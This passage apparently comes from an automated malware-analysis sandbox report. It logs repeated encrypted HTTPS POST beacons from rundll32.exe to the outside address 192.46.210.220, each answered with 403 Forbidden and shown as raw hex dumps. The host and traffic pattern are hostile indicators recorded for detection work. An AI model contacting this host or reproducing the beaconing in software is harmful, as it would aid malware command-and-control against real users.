                                                                                                              2021-10-28 02:49:58 UTC139OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:59 UTC149INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:59 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              29192.168.2.449899192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:58 UTC144OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:58 UTC144OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:59 UTC149INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:59 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.449793192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:07 UTC14OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:07 UTC15OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:07 UTC19INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:07 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              30192.168.2.449907192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:03 UTC149OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:03 UTC149OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:03 UTC159INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:03 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              31192.168.2.449908192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:03 UTC154OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:03 UTC154OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:03 UTC159INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:03 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              32192.168.2.449916192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:07 UTC159OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:07 UTC159OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:07 UTC169INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:07 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              33192.168.2.449915192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:07 UTC164OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:07 UTC164OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:07 UTC169INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:07 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              34192.168.2.449928192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:11 UTC169OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:11 UTC169OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:11 UTC179INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:11 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              35192.168.2.449929192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:11 UTC174OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:11 UTC174OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:11 UTC179INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:11 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              36192.168.2.449936192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:14 UTC179OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:14 UTC179OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:15 UTC189INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:15 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              37192.168.2.449937192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:14 UTC184OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:14 UTC184OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:15 UTC189INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:15 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              38192.168.2.449945192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:18 UTC189OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:18 UTC189OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:19 UTC199INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:19 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              39192.168.2.449946192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:18 UTC194OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:18 UTC194OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:19 UTC199INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:19 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.449799192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:10 UTC19OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
